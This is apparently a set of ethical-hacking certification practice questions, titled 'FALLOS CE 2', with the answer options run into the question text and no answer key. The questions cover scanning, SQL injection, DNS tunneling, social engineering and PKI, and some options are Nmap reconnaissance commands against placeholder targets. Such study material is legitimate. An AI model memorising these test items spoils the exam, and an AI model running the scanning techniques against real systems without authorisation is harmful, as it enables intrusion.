FALLOS CE 2

Attacker Lauren has gained the credentials of an organization's internal server system, and she was often logging in during irregular times to monitor the network activities. The organization was skeptical about the login times and appointed security professional Robert to determine the issue. Robert analyzed the compromised device to find incident details such as the type of attack, its severity, target, impact, method of propagation, and vulnerabilities exploited. What is the incident handling and response (IH&R) phase, in which Robert has determined these issues?. Incident triage. Eradication. Preparation. Incident recording and assignment.

Clark is a professional hacker. He created and configured multiple domains pointing to the same host to switch quickly between the domains and avoid detection. Identify the behavior of the adversary in the above scenario. Use of command-line interface. Data staging. Unspecified proxy activities. Use of DNS tunneling.

Morris, a professional hacker, performed a vulnerability scan on a target organization by sniffing the traffic on the network to identify the active systems, network services, applications, and vulnerabilities. He also obtained the list of the users who are currently accessing the network. What is the type of vulnerability assessment that Morris performed on the target organization?. Internal assessment. External assessment. Credentialed assessment. Passive assessment.

David is a security professional working in an organization, and he is implementing a vulnerability management program in the organization to evaluate and control the risks and vulnerabilities in its IT infrastructure. He is currently executing the process of applying fixes on vulnerable systems to reduce the impact and severity of vulnerabilities. Which phase of the vulnerability-management life cycle is David currently in?. Remediation. Risk assessment. Verification. Vulnerability scan.

When conducting a penetration test, it is crucial to use all means to get all available information about the target network. One of the ways to do that is by sniffing the network. Which of the following cannot be performed by the passive network sniffing?. Capturing a network traffic for further analysis. Collecting unencrypted information about usernames and passwords. Modifying and replaying captured network traffic. Identifying operating systems, services, protocols and devices.

You have been authorized to perform a penetration test against a website. You want to use Google dorks to footprint the site but only want results that show file extensions. What Google dork operator would you use?. inurl. filetype. site. ext.

John, a professional hacker, decided to use DNS to perform data exfiltration on a target network. In this process, he embedded malicious data into the DNS protocol packets that even DNSSEC cannot detect. Using this technique, John successfully injected malware to bypass a firewall and maintained communication with the victim machine and C&C server. What is the technique employed by John to bypass the firewall?. DNS enumeration. DNS tunneling method. DNS cache snooping. DNSSEC zone walking.

Jane, an ethical hacker, is testing a target organization's web server and website to identify security loopholes. In this process, she copied the entire website and its content on a local drive to view the complete profile of the site's directory structure, file structure, external links, images, web pages, and so on. This information helps Jane map the website's directories and gain valuable information. What is the attack technique employed by Jane in the above scenario?. Session hijacking. Website mirroring. Website defacement. Web cache poisoning.

Jim, a professional hacker, targeted an organization that is operating critical industrial infrastructure. Jim used Nmap to scan open ports and running services on systems connected to the organization's OT network. He used an Nmap command to identify Ethernet/IP devices connected to the Internet and further gathered information such as the vendor name, product code and name, device name, and IP address. Which of the following Nmap commands helped Jim retrieve the required information?. nmap -Pn -sT -p 102 --script s7-info < Target IP >. nmap -Pn -sU -p 44818 --script enip-info < Target IP >. nmap -Pn -sT -p 46824 < Target IP >. nmap -Pn -sT --scan-delay 1s --max-parallelism 1 -p < Port List > < Target IP >.

Ethical hacker Jane Smith is attempting to perform an SQL injection attack. She wants to test the response time of a true or false response and wants to use a second command to determine whether the database will return true or false results for user IDs. Which two SQL injection types would give her the results she is looking for?. Out of band and boolean-based. Union-based and error-based. Time-based and boolean-based. Time-based and union-based.

Samuel, a professional hacker, monitored and intercepted already established traffic between Bob and a host machine to predict Bob's ISN. Using this ISN, Samuel sent spoofed packets with Bob's IP address to the host machine. The host machine responded with a packet having an incremented ISN. Consequently, Bob's connection got hung, and Samuel was able to communicate with the host machine on behalf of Bob. What is the type of attack performed by Samuel in the above scenario?. UDP hijacking. Forbidden attack. Blind hijacking. TCP/IP hijacking.

Harry, a professional hacker, targets the IT infrastructure of an organization. After preparing for the attack, he attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these techniques, he successfully deployed malware on the target system to establish an outbound connection. What is the APT lifecycle phase that Harry is currently executing?. Cleanup. Initial intrusion. Persistence. Preparation.

There are multiple cloud deployment options depending on how isolated a customer's resources are from those of other customers. Shared environments share the costs and allow each customer to enjoy lower operations expenses. One solution is for a customer to join with a group of users or organizations to share a cloud environment. What is this cloud deployment option called?. Community. Public. Private. Hybrid.

Steve, an attacker, created a fake profile on a social media website and sent a request to Stella. Stella was enthralled by Steve's profile picture and the description given for his profile, and she initiated a conversation with him soon after accepting the request. After a few days, Steve started asking about her company details and eventually gathered all the essential information regarding her company. What is the social engineering technique Steve employed in the above scenario?. Piggybacking. Honey trap. Diversion theft. Baiting.

A DDoS attack is performed at layer 7 to take down web infrastructure. Partial HTTP requests are sent to the web infrastructure or applications. Upon receiving a partial request, the target servers opens multiple connections and keeps waiting for the requests to complete. Which attack is being described here?. Phlashing. Desynchronization. Session splicing. Slowloris attack.

While browsing his Facebook feed, Matt sees a picture one of his friends posted with the caption, `Learn more about your friends!`, as well as a number of personal questions. Matt is suspicious and texts his friend, who confirms that he did indeed post it. With assurance that the post is legitimate, Matt responds to the questions on the post. A few days later, Matt's bank account has been accessed, and the password has been changed. What most likely happened?. Matt's computer was infected with a keylogger. Matt inadvertently provided the answers to his security questions when responding to the post. Matt inadvertently provided his password when responding to the post. Matt's bank-account login information was brute forced.

Alice needs to send a confidential document to her coworker, Bryan. Their company has public key infrastructure set up. Therefore, Alice both encrypts the message and digitally signs it. Alice uses _______________ to encrypt the message, and Bryan uses _______________ to confirm the digital signature. Bryan's private key; Alice's public key. Bryan's public key; Bryan's public key. Bryan's public key; Alice's public key. Alice's public key; Alice's public key.

Attacker Rony installed a rogue access point within an organization's perimeter and attempted to intrude into its internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that is aimed at cracking the authentication mechanism. He immediately turned off the targeted network and tested for any weak and outdated security mechanisms that are open to attack. What is the type of vulnerability assessment performed by Johnson in the above scenario?. Application assessment. Wireless network assessment. Distributed assessment. Host-based assessment.

Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range in a given target network. Which of the following host discovery techniques must he use to perform the given task?. ACK flag probe scan. ARP ping scan. TCP Maimon scan. UDP scan.

Sam is a penetration tester hired by Inception Tech, a security organization. He was asked to perform port scanning on a target host in the network. While performing the given task, Sam sends FIN/ACK probes and determines that an RST packet is sent in response by the target host, indicating that the port is closed. What is the port scanning technique used by Sam to discover open ports?. ACK flag probe scan. IDLE/IPID header scan. Xmas scan. TCP Maimon scan.

If you send a TCP ACK segment to a known closed port on a firewall but it does not respond with an RST, what do you know about the firewall you are scanning?. It is a stateful firewall. This event does not tell you anything about the firewall. There is no firewall in place. It is a non-stateful firewall.

Which of the following is a command line packet analyzer similar to GUI-based Wireshark?. ethereal. tcpdump. nessus. jack the ripper.

Your company was hired by a small healthcare provider to perform a technical assessment on the network. What is the best approach for discovering vulnerabilities on a Windows-based computer?. Use a scan tool like Nessus. Use the built-in Windows Update tool. Create a disk image of a clean Windows installation. Check MITRE.org for the latest list of CVE findings.

An Intrusion Detection System (IDS) has alerted the network administrator to a possibly malicious sequence of packets sent to a Web server in the network's external DMZ. The packet traffic was captured by the IDS and saved to a PCAP file. What type of network tool can be used to determine if these packets are genuinely malicious or simply a false positive?. Intrusion Prevention System (IPS). Vulnerability scanner. Protocol analyzer. Network sniffer.

An organization is performing a vulnerability assessment for mitigating threats. James, a pen tester, scanned the organization by building an inventory of the protocols found on the organization's machines to detect which ports are attached to services such as an email server, a web server, or a database server. After identifying the services, he selected the vulnerabilities on each machine and started executing only the relevant tests. What is the type of vulnerability assessment solution that James employed in the above scenario?. Tree-based assessment. Inference-based assessment. Product-based solutions. Service-based solutions.

SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests, which may bypass authentication and allow attackers to access and/or modify data attached to a web application. Which of the following SQLi types leverages a database server's ability to make DNS requests to pass data to an attacker?. Time-based blind SQLi. Out-of-band SQLi. Union-based SQLi. In-band SQLi.

Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the target network and determining whether the ports are online and any firewall rule sets are encountered. John decided to perform a TCP SYN ping scan on the target network. Which of the following Nmap commands must John use to perform the TCP SYN ping scan?. nmap -sn -PA < target IP address >. nmap -sn -PP < target IP address >. nmap -sn -PS < target IP address >. nmap -sn -PO < target IP address >.

John wants to send Marie an email that includes sensitive information, and he does not trust the network that he is connected to. Marie gives him the idea of using PGP. What should John do to communicate correctly using this type of encryption?. Use his own private key to encrypt the message. Use his own public key to encrypt the message. Use Marie's public key to encrypt the message. Use Marie's private key to encrypt the message.

Dorian is sending a digitally signed email to Poly. With which key is Dorian signing this message and how is Poly validating it?. Dorian is signing the message with Poly's public key, and Poly will verify that the message came from Dorian by using Dorian's public key. Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by using Dorian's public key. Dorian is signing the message with his public key, and Poly will verify that the message came from Dorian by using Dorian's private key. Dorian is signing the message with Poly's private key, and Poly will verify that the message came from Dorian by using Dorian's public key.

Which of the following Linux commands will resolve a domain name into IP address?. >host -t soa hackeddomain.com. >host-t ns hackeddomain.com. >host-t a hackeddomain.com. >host -t AXFR hackeddomain.com.

Which of the following program infects the system boot sector and the executable files at the same time?. Stealth virus. Multipartite Virus. Polymorphic virus. Macro virus.

Steve, a scientist who works in a governmental security agency, developed a technological solution to identify people based on walking patterns and implemented this approach to a physical control access. A camera captures people walking and identifies the individuals using Steve's approach. After that, people must approximate their RFID badges. Both the identifications are required to open the door. In this case, we can say: The solution implements the two authentication factors: physical object and physical characteristic. Although the approach has two phases, it actually implements just one authentication factor. The solution will have a high level of false positives. Biological motion cannot be used to identify people.

The collection of potentially actionable, overt, and publicly available information is known as. Social intelligence. Open-source intelligence. Real intelligence. Human intelligence.

Hackers often raise the trust level of a phishing message by modeling the email to look similar to the internal email used by the target company. This includes using logos, formatting, and names of the target company. The phishing message will often use the name of the company CEO, President, or Managers. The time a hacker spends performing research to locate this information about a company is known as?. Exploration. Reconnaissance. Enumeration. Investigation.

You need to deploy a new web-based software package for your organization. The package requires three separate servers and needs to be available on the Internet. What is the recommended architecture in terms of server placement?. A web server facing the Internet, an application server on the internal network, a database server on the internal network. All three servers need to face the Internet so that they can communicate between themselves. A web server and the database server facing the Internet, an application server on the internal network. All three servers need to be placed internally.

An attacker, using a rogue wireless AP, performed an MITM attack and injected an HTML code to embed a malicious applet in all HTTP connections. When users accessed any page, the applet ran and exploited many machines. Which one of the following tools the hacker probably used to inject HTML code?. Aircrack-ng. Ettercap. Tcpdump. Wireshark.

A company's security policy states that all Web browsers must automatically delete their HTTP browser cookies upon terminating. What sort of security breach is this policy attempting to mitigate?. Attempts by attackers to access passwords stored on the user's computer without the user's knowledge. Attempts by attackers to determine the user's Web browser usage patterns, including when sites were visited and for how long. Attempts by attackers to access Web sites that trust the Web browser user by stealing the user's authentication credentials. Attempts by attackers to access the user and password information stored in the company's SQL database.

Which of the following is a low-tech way of gaining unauthorized access to systems?. Eavesdropping. Scanning. Sniffing. Social Engineering.

What does a firewall check to prevent particular ports and applications from getting packets into an organization?. Network layer headers and the session layer port numbers. Presentation layer headers and the session layer port numbers. Transport layer port numbers and application layer headers. Application layer port numbers and the transport layer headers.

PGP, SSL, and IKE are all examples of which type of cryptography?. Hash Algorithm. Digest. Secret Key. Public Key.

Which of the following tools is used to analyze the files produced by several packet-capture programs such as tcpdump, WinDump, Wireshark, and EtherPeek?. tcptraceroute. Nessus. tcptrace. OpenVAS.

A large mobile telephony and data network operator has a data center that houses network elements. These are essentially large computers running on Linux. The perimeter of the data center is secured with firewalls and IPS systems. What is the best security policy concerning this setup?. Network elements must be hardened with user ids and strong passwords. Regular security tests and audits should be performed. As long as the physical access to the network elements is restricted, there is no need for additional measures. There is no need for specific security measures on the network elements as long as firewalls and IPS systems exist. The operator knows that attacks and down time are inevitable and should have a backup site.

The configuration allows a wired or wireless network interface controller to pass all traffic it receives to the Central Processing Unit (CPU), rather than passing only the frames that the controller is intended to receive. Which of the following is being described?. Promiscuous mode. WEM. Multi-cast mode. Port forwarding.

While performing online banking using a Web browser, a user receives an email that contains a link to an interesting Web site. When the user clicks on the link, another Web browser session starts and displays a video of cats playing a piano. The next business day, the user receives what looks like an email from his bank, indicating that his bank account has been accessed from a foreign country. The email asks the user to call his bank and verify the authorization of a funds transfer that took place. What Web browser-based security vulnerability was exploited to compromise the user?. Clickjacking. Cross-Site Scripting. Cross-Site Request Forgery. Web form input validation.

A network administrator discovers several unknown files in the root directory of his Linux FTP server. One of the files is a tarball, two are shell script files, and the third is a binary file is named `nc.` The FTP server's access logs show that the anonymous user account logged in to the server, uploaded the files, and extracted the contents of the tarball and ran the script using a function provided by the FTP server's software. The ps command shows that the nc file is running as process, and the netstat command shows the nc process is listening on a network port. What kind of vulnerability must be present to make this remote attack possible?. Directory traversal. File system permissions. Brute force login. Privilege escalation.

A technician is resolving an issue where a computer is unable to connect to the Internet using a wireless access point. The computer is able to transfer files locally to other machines, but cannot successfully reach the Internet. When the technician examines the IP address and default gateway they are both on the 192.168.1.0/24. Which of the following has occurred?. The computer is using an invalid IP address. The gateway is not routing to a public IP address. The computer is not using a private IP address. The gateway and the computer are not on the same network.

An attacker is trying to redirect the traffic of a small office. That office is using their own mail server, DNS server and NTP server because of the importance of their job. The attacker gain access to the DNS server and redirect the direction www.google.com to his own IP address. Now when the employees of the office want to go to Google they are being redirected to the attacker machine. What is the name of this kind of attack?. Smurf Attack. DNS spoofing. MAC Flooding. ARP Poisoning.

Identify the web application attack where the attackers exploit vulnerabilities in dynamically generated web pages to inject client-side script into web pages viewed by other users. Cross-Site Scripting (XSS). SQL injection attack. LDAP Injection attack. Cross-Site Request Forgery (CSRF).

You are working as a Security Analyst in a company XYZ that owns the whole subnet range of 23.0.0.0/8 and 192.168.0.0/8. While monitoring the data, you find a high number of outbound connections. You see that IP's owned by XYZ (Internal) and private IP's are communicating to a Single Public IP. Therefore, the Internal IP's are sending data to the Public IP. After further analysis, you find out that this Public IP is a blacklisted IP, and the internal communicating devices are compromised. What kind of attack does the above scenario depict?. Botnet Attack. Spear Phishing Attack. Rootkit Attack. Advanced Persistent Threats.

As a Certified Ethical Hacker, you were contracted by a private firm to conduct an external security assessment through penetration testing. What document describes the specifics of the testing, the associated violations, and essentially protects both the organization's interest and your liabilities as a tester?. Rules of Engagement. Non-Disclosure Agreement. Project Scope. Service Level Agreement.

What does the `"oX flag do in an Nmap scan?. Perform an eXpress scan. Perform an Xmas scan. Output the results in truncated format to the screen. Output the results in XML format to a file.

Which of the following is an extremely common IDS evasion technique in the web world?. Subnetting. Unicode Characters. Port Knocking. Spyware.

Which of the following tools performs comprehensive tests against web servers, including dangerous files and CGIs?. Nikto. John the Ripper. Dsniff. Snort.

In an internal security audit, the white hat hacker gains control over a user account and attempts to acquire access to another account's confidential files and information. How can he achieve this?. Hacking Active Directory. Shoulder-Surfing. Privilege Escalation. Port Scanning.

User A is writing a sensitive email message to user B outside the local network. User A has chosen to use PKI to secure his message and ensure only user B can read the sensitive email. At what layer of the OSI layer does the encryption and decryption of the message take place?. Presentation. Transport. Application. Session.

An attacker attaches a rogue router in a network. He wants to redirect traffic to a LAN attached to his router as part of a man-in-the-middle attack. What measure on behalf of the legitimate admin can mitigate this attack?. Make sure that legitimate network routers are configured to run routing protocols with authentication. Disable all routing protocols and only use static routes. Redirection of the traffic cannot happen unless the admin allows it explicitly. Only using OSPFv3 will mitigate this risk.

`........is an attack type for a rogue Wi-Fi access point that appears to be a legitimate one offered on the premises, but actually has been set up to eavesdrop on wireless communications. It is the wireless version of the phishing scam. An attacker fools wireless users into connecting a laptop or mobile phone to a tainted hotspot by posing as a legitimate provider. This type of attack may be used to steal the passwords of unsuspecting users by either snooping the communication link or by phishing, which involves setting up a fraudulent web site and luring people there.` Fill in the blank with appropriate choice. Evil Twin Attack. Signal Jamming Attack. Sinkhole Attack. Collision Attack.

You are tasked to perform a penetration test. While you are performing information gathering, you find an employee list in Google. You find the receptionist's email, and you send her an email changing the source email to her boss's email (boss@company). In this email, you ask for a pdf with information. She reads your email and sends back a pdf with links. You exchange the pdf links with your malicious links (these links contain malware) and send back the modified pdf, saying that the links don't work. She reads your email, opens the links, and her machine gets infected. You now have access to the company network. What testing method did you use?. Piggybacking. Eavesdropping. Social engineering. Tailgating.

During a black-box pen test you attempt to pass IRC traffic over port 80/TCP from a compromised web enabled host. The traffic gets blocked; however, outbound HTTP traffic is unimpeded. What type of firewall is inspecting outbound traffic?. Packet Filtering. Application. Stateful. Circuit.